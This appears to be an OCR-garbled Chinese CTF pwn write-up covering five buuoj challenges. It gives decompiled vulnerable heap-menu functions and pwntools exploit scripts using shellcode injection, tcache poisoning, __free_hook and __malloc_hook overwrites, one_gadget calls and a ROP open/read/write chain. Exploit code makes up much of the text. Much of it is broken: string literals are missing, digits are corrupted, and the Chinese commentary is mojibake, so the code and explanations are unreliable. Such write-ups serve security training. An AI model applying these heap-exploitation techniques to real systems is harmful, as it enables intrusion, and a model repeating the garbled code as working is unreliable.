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__inte4 __ fastcall sub_400786(_BYTE *al)

{
_BYTE *i; // [rsp+18h] [rbp-16h]

while ( *al )

{
for ( 1 = &unk_400978; *1 && *1 != *al; ++1 )

if (1*i)
return OLL;
++21;

h

return 1LL;

¥

ARG fshellcode it — I, A T4 A ¥ shellcode AN 755 b ARELE A T4 s Fh 4R 21
TS AT H

.rodata:0000000000400978 aZzjLovesShellC db 'ZZJ loves shell code,and here is a gift:'
.rodata:0000000000400978 ; DATA XREF: sub_4808786+8T0
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ptr [xrdx], bh
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add byte ptr [rdx], bh

add byte ptr [rdx], bh
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exp

from pwn import

,29348)

asm(shellcraft.sh())

r.sendline(payload)

r.interactive()

132 SWPUCTF_2019_p1KkHeap



i

ARCH_X86_64

count

count

S

add

int v3; // [rsp+4h] [rbp-Ch]
size_t size; // [rsp+8h] [rbp-8h]

printf(“size: ");
size = (int)sub_1@76("size: ", a2);
if ( size > oxlee )
sub_E@4("size: ", a2);
v3 = sub_DA9();
if ((v3 <=7)
{
qword_2021ee[v3]
dword_2020Ee[v3]
}

return puts("Done!");

malloc(size);
size;
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show

int sub_F58()

{
unsigned __inté4 v1; // [rsp+8h] [rbp-8h]
printf("id: ");
vl = sub_10876();
if (vl > 7)
sub_E@4();
printf(“content: ");
puts((const char *)gword_202100[v1]);
return puts("Done!");
}
edit

int sub_EC1()

{
unsigned __inté4 v1; // [rsp+8h] [rbp-8h]

printf("id: ");
vl = sub_1076();
if (vli>7)
sub_Ee4();
printf("content: ");
read(@, (void *)gword_202180[v1], (int)dword_22@Ee[vl1]);
return puts(“Done!");

free

int sub_FD1()

{
unsigned __inte4 vi1; // [rsp+8h] [rbp-8h]

if ( dword_202020 <= 0 )
sub_Ee4();

printf("id: ");

vl = sub_1076();

if (vl >7)

sub_Ee4();
free((void *)qword_202108[v1]);
word_ v =9,

--dword_20820280;
return puts("Done!");

h
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PUTS |
while ( dword_202024 > © )

{
sub 108C5():

REFIEA RS, B R RERATThRE18IK.
RHIIEE 2

fd = open("./logo", 4);

read(fd, &unk_262140, ©x10932ull);

write(1l, &unk_202140, ©x10932ulLl);

write(1l, asc_202040, ©x52ull);

close(fd);

if ( mmap((void *)@x66660000, ©x1000uLlL, 7, 34, -1, OLL) != (void *)1717960704 )
exit(-1);

memset((volid *)@x66660000, ©, ©xleeeulLl);

strcpy((char *)@x66660000, "SWPUCTF_plKk");

prctl(38, 1LL, OLL, eLL, OLL);

vd = 32;
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typedef struct tcache_entry
{
struct tcache_entry *next;

} tcache_entry;

typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __ thread bool tcache_shutting_down false;
static _ thread tcache_perthread_struct *tcache = NULL;

BIMSEEME A T — Rk

unsigned long trim_threshold;
INTERNAL_SIZE T top_pad;
INTERNAL_SIZE T mmap_threshold;
INTERNAL_SIZE_T arena_test;
INTERNAL_SIZE_T arena_max;

int n_mmaps;
int n_mmaps_max;

int max_n_mmaps;

int no_dyn_threshold;

INTERNAL_SIZE T mmapped_mem;

INTERNAL_SIZE T max_mmapped_mem;

char *sbrk_base;

#if USE_TCACHE

size_t tcache_bins;
size_t tcache_max_bytes;

size_t tcache_count;

size_t tcache_unsorted limit;
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exp

from pwn import

context.arch

r = process(
libc = ELF(
)

add(size):
.recvuntil(
.sendline(
.recvuntil(

.sendline(

show(idx):
.recvuntil(
.sendline(
.recvuntil(

.sendline(

free(idx):
.recvuntil(
.sendline(
.recvuntil( )
.sendline( (idx))

edit(idx,data):
.recvuntil(
.sendline(
.recvuntil(
.sendline(
.recvuntil(
.send(data)




r.recvuntil( )
first _chunk=u64(r.recv(6).1ljust(8,
tcache_entry=first_chunk-0x360 + ©xc8

rwx_add=0x66660000
edit(4,p64(rwx_add))

shellcode=shellcraft.amd64. ( )
shellcode+=shellcraft.amd64.read(3,0x66660300,64)
shellcode+=shellcraft.amd64.write(1,0x66660300,64)
edit(5,asm(shellcode))

)
main_arena_xx ub4(r.recv(6).ljust(8, )D)
malloc_hook ((main_arena_xx & Oxfffffffffffffooo) (libc.sym[ ] oxfff))
libc_base = malloc_hook - libc.sym|[ ]

print( (libc_base))

edit(4,p64(malloc_hook))

r.interactive()
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int vl1; // [rsp+4h]

void **v2; // [rsp+8h] [rbp-

size_t size[5]; // [rsp+1@h] [rbp-36h] BY
unsigned __inted v4; //

vl = raadfeawnrdf Bv2? R0\ -
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if ( Fgap_number > 12 )
{
puts("Enough!™);
exit(e);
}
vl = heap_number;
*((_QWORD *)&heap_addr + v1) = malloc(@x18ulLlL);
puts("Please input the size of compary's name");

__1s0c99_scanf("%d", size);

*(_DWORD *)(*((_QWORD *)&heap_addr + heap_number) + 8LL) = size[@];
v2 = (void **)*((_QWORD *)&heap_addr + heap_number);

*y2 = malloc(LODWORD(size[@]));

puts(“"please input name:");

read(e@, **((void ***)&heap_addr + heap_number), LODWORD(:zize[@]));
puts("please input compary call:");

read(®, (void *)(*((_QWORD *)&heap_addr + heap_number) + 12LL), ©xCulLl);
*(_BYTE *)(*((_QWORD *)&heap_addr + heap_number) + 23LL) = ©;
puts("Done!");

++heap_number;

return __readfsqword(@x28u) " v4;

ptr Nname
Size

call

show

u

{

nsigned _ int64 show()

int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __inté64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsgword(@x28u);
puts("Please input the index:");
__1s0c99_scanf("%d", &vl);
getchar();

if (¥ ( OWORD *YR&hean addr + w1Y )
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{
puts(“name:");
puts(**((const char ***)&heap_addr + v1));
puts(“phone:");
puts((const char *)(*((_QWORD *)&heap_addr + v1) + 12LL));
}
puts(“Done!");
return __readfsqword(@x28u) ~ v2;

¥
PR -
call

unsigned __int64 call()

{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __inté4 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsgword(@x28u);

puts("Please input the index:");

__1s0c99_scanf("%d", &vl);

if ( *((_QWORD *)&heap_addr + v1) )
free(**((void ***)&heap_addr + v1));

puts( You try 1t!l");

puts("Done");

return __readfsqword(@x28u) ~ v2;

-
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from pwn import

r remote( , 29462)
libc ELF( )

context.log level

def add(size, name):
.sendlineafter(
.sendlineafter(
.sendafter(

.sendlineafter(

def show(index):
r.sendlineafter(
r.sendlineafter( (index))

def call(index):
r.sendlineafter(
r.sendlineafter( (index))

main_arena_xx ub4(r.recvuntil( )[-6:].1just(8, )D)
malloc_hook ((main_arena_xx & Oxfffffffffffffooo) (libc.sym[
libc_base malloc_hook libc.sym[ ]

free_hook = libc_base + libc.sym[

system_addr libc_base libc.sym[

(libc_base)

add(0x20, p64(free_hook))
add (0x20, )
add(0x20, p64(system_addr))

call(3)

r.interactive()
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unsigned int sub_11D5()
{
setbuf(stdin, ©LL);
setbuf(stdout, ©LL);
setbuf(stderr, OLL);
qword_4858 = (__inte4)malloc(exleeeuLl);
if ( !qword_4@58 )

{
puts("What?");
exit(-1);
}
qword_40850 = qword_4058 & OxFFFFFFFFFFFFFeeeLL;
return alarm(@x1Eu);

BELSEHIEASEL, HiE 70x1000, fdfftihl:
{RAFAE 74058, chunkk (i RA7AE T 4050.

WHRESOTT .

ARCH_X86_64

count

count
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if ((vd4 ==1)
{
if ( gqword_4018 <= © )
sub_14FB();
al = (__int64)v3;
get(v3);
--qword_4018;
3



%217 ~chunk.

if (v5 1= 16 && v5 != 240 && v5 != 768 && v5 = 1024 )
sub_14FB();
*(_QWORD *)(16LL * v4 + al) = calloc(luLL, v5);
*(_DWORD *)(al + 16LL * v4 + 8) = Vv5;
printf(“Please input content: ");
v2 = read(@, *(void **)(16LL * v4 + al), *(int *)(16LL * v4 + 2l + 8));
if (v2<=190)
sub_14FB();
*(_BYTE *)(v2 - 1LL + *(_QWORD *)(16LL * v4 + al)) = @;
return puts(“Done!");

char v3[268]; // [t
int v4: // Trsp+lec

M hk FROK/IN & SRAFAE T A% LT

int _ fastcall throw(__inté4 al)

(
unsigned int v2; // [rsp+1Ch] [rbp-4h]

printf(“Please input the red packet idx: ");

v2 = input();

if ( v2 > ex10 || !*( QWORD *)(16LL * v2 + al1) )
sub_14FB();

free(*(void **)(16LL * v2 + al));

return puts("Done!");

uaf



change

.lint _ fastcall sub_1740(__inté4 al)
'
int v2; // [rsp+18h] [rbp-8h]

unsigned int v3; // [rsp+1Ch] [rbp-4h]

if ( qword_4010 <= @ )
sub_ 5
i}l --qword_4818;
)| printf("Please input the red packet idx: ");
) v3 = input();
| if (v3 > ex10 || !*(_QWORD *)(16LL * v3 + al) )
' sub_14FB();
i| printf("Please input content: ");
b v2 = read(®, *(void **)(16LL * v3 + al), *(int *)(16LL * v3 + al + 8));
| if (v2<=90)
) sub_14FB();
|k BYTE *)(v2 - 1LL + *(_QWORD *)(16LL * v3 + 21)) = @;
3| return puts("Done!");

BN, mH A s,

int _ fastcall watch(__inté4 al)

{
unsigned int v2; // [rsp+1Ch] [rbp-4h]
printf("Please input the red packet idx: ");
v2 = input();
if ((v2 > ex10 || !*(_QWORD *)(16LL * v2 + al) )
sub_14FB();
puts(*(const char **)(16LL * v2 + al));
return puts("Done!");
¥
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from pwn import
r remote( , 26748)

context(log level , arch

elf = ELF( )

libc = ELF( )

one_gadget_19 [0xe237f, ©xe2383, Oxe2386, 0x106ef8]

menu
def add(index, choice, content):
r.recvuntil(menu)
r.sendline( )
.recvuntil(
.sendline( (index))
.recvuntil(
.sendline( (choice))
.recvuntil(
.send(content)

def delete(index):
r.recvuntil(menu)
r.sendline( )
r.recvuntil(
r.sendline( (index))

def edit(index, content):
r.recvuntil(menu)
r.sendline( )

.recvuntil(

.sendline( (index))

.recvuntil(

-
-
-
-

.send(content)

def show(index):




r.sendline(
r.recvuntil(

r.sendline( (index))

for i in (7):
add(e,4, )
delete(9)

for i in
add(1,2,
delete(1)

show(9)
last _chunk_addr ub4(r.recvuntil( ).strip().1ljust(8,
last_chunk_addr 0x26C0
(heap_addr))

ub4(r.recvuntil( ).strip().1ljust(8, ))) ox60 - 0x10
malloc_hook libc.sym[
(libc.address))

0x300+p64(0)+p64(0x101)+p64 (heap_addr+0x37E0Q)+p64(heap_addr+0x250+0x10+0x800-0x10)

pop_rdi_ret libc.address 0x26542
pop_rsi_ret libc.address 0x26f9%e
pop_rdx_ret libc.address Ox12bda6
file name_addr heap_addr + 0x4A40
flag addr = file_name_addr + ©x200
ROP_chain

ROP_chain p64(pop_rdi_ret)
ROP_chain p64(file_name_addr)
ROP_chain p64(pop_rsi_ret)
ROP_chain p64(9)

ROP_chain p64(libc.symbols|

ROP_chain p64(pop_rdi_ret)
ROP_chain p64(3)

ROP_chain p64(pop_rsi_ret)
ROP_chain p64(flag_addr)
ROP_chain p64(pop_rdx_ret)




p64 (0x40)
p64(libc.symbols|
p64(pop_rdi_ret)
p64(1)
p64(pop_rsi_ret)
p64(flag addr)
p64(pop_rdx_ret)
p64(0x40)
p64(libc.symbols|

add(4,4,ROP_chain)

libc.address 0x58373
)
.sendline(
.recvuntil( )
.sendline( 0x80 p64(file name_addr) p64(leave ret))

.interactive()
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add

unsigned __inté4 size; // [rsp+18h] [rbp-2028h]
char s[8216]; // [rsp+2@h] [rbp-2©2@h] BYREF
unsigned __inté4 v5; // [rsp+2838h] [rbp-8h]

v5 = __readfsqword(@x28u);
memset(s, ©, @x2010uLL);
for (1 =8; ; ++1 )
{
if (1>9)
{
puts(":(");
return __readfsqword(@x28u) ~ v5;
¥
if ( l!address_array[i] )
break:;
¥
printf("Size:");
size = sub_B67("Size:", OLL);
if ( size > @x2ee00 )
exit(-2);
est = (char *)malloc(size);
if ( ldest )
exit(-1);
printf("Data:");
input(s, (unsigned int)size);

ress_array[1
size_array[i] = size;
return __readfsqword(@®x28u) "~ v5;

IR H AR IX A strepy s
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show

int show()
{
__inte4 ve; // rax
unsigned __inté4 v2; // [rsp+8h] [rbp-8h]

printf("Index:");
v2 = sub_B67();
if (v2 >9)

exit(-3);
v = address_array[v2];
if (ve )
LODWORD(ve) = puts((const char *)address_array[v2]);
return ve;
}
free

int delete()

{
unsigned __inté4 v1; // [rsp+8h] [rbp-8h]

printf("Index:");
vl = sub_B67();
if (vl >9)
exit(-3);
if ( address_array[vl] )
{

memset((void *)address_array[vl], 218, size_array[vl]);
free((void *)address_array[vl]);

address_array[vl] = OLL;

size_array[vl] = OLL;

}

return puts(”:)");

THHERE BT
Jit UL IR 5t =2 off by null.

FIF B E R IR 2 BT —#E, AR —FE. FRATHIE44 chunk, A,B,C,D. AR {ifunlink, Bifoverlapping, Citsized
nullf], DB k4 freeFltop chunk.
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free((void *)address_array[v l]}
address_array[vl] = OLL;
size_array[vl] = @LL;

E%ﬁ%%%may*U%MWRMMﬁJmmﬁMﬁﬁ T HLIRATTHE 8 H O s 38 B B stropy 2 4 OO 8 Wy, N2 A5
HH, BARNINAZEAE A LZAELIXA b 8

BATHO MR RS RE T, S0 nulis 1 2, freefi 2 G B AT chunk b 2 78 i b 3 Bodls, FRATm— A — AN 350 H off by
nulbkiE %, faitdiipre size Gtk 3, SRIAFIFRA T —AF) H R .

from pwn import

elf = ELF(
r remote( ,29401)
libc ELF( )

def add(size, content):
r.recvuntil(
.sendline(
.recvuntil( )

.recvuntil( )

a
a
r.sendline( (size))
a
a

.send(content)

def free(index):
r.recvuntil(
r.sendline(
r.recvuntil( )
r.sendline( (index))

def show(index):
r.recvuntil(
r.sendline(
r.recvuntil( )
r.sendline( (index))

3

add(oxe8-1i, (oxe8-1))
free(0)
add (oxe8, 0xe0+p64(0x510))

leak addr ub4(p.recv(6).ljust(8,
(leak_addr))
leak_addr -0x3ebcad
free hook libc base libc.sym




add (0x60,p64(free_hook))
add (0x60,p64(free_hook))
one_gadget = libc_base + 0x4f322

add (0x60,p64(one_gadget))

free(0)

r.interactive()




	buuoj Pwn writeup 131-135
	131 starctf_2019_babyshell
	132 SWPUCTF_2019_p1KkHeap
	133 ciscn_2019_s_6
	134 [2020 新春红包题]3
	135 hitcon_2018_children_tcache

